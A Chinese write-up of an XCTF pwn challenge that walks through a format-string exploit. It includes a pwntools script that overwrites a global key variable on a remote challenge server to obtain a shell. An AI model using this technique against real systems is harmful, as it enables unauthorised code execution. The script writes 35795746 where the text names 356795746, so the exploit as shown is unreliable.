共计 564 个字符，预计需要花费 2 分钟才能阅读完成。

提醒：本文最后更新于 2024-08-27 11:05，文中所关联的信息可能已发生改变，请知悉！

XCTF-PWN- 实时数据监测

题目描述

小 A 在对某家医药工厂进行扫描的时候，发现了一个大型实时数据库系统。小 A 意识到实时数据库系统会采集并存储与工业流程相关的上千节点的数据，只要登录进去，就能拿到有价值的数据。小 A 在尝试登陆实时数据库系统的过程中，一直找不到修改登录系统 key 的方法，虽然她现在收集到了能够登陆进系统的 key 的值，但是只能想别的办法来登陆。

WP

checksec

IDA

发现只需要让 key == 356795746，就能拿到 shell

得到 key 的地址：0x0804A048

而 imagemagic 函数中有格式化字符串的漏洞

测试偏移

找到 0x61616161 的位置，得到偏移为 12

EXP

from pwn import *

# p = process('./sssjjc')
p = remote('111.200.241.244', 52134)
context.log_level = 'debug'

key_addr = 0x0804A048
payload = fmtstr_payload(12, {key_addr:35795746})
# 用这个函数挺惭愧的，因为手算还是有些难度，理解了一题，换一题还是算不出来

# p.recv()
p.sendline(payload)
p.interactive()

结果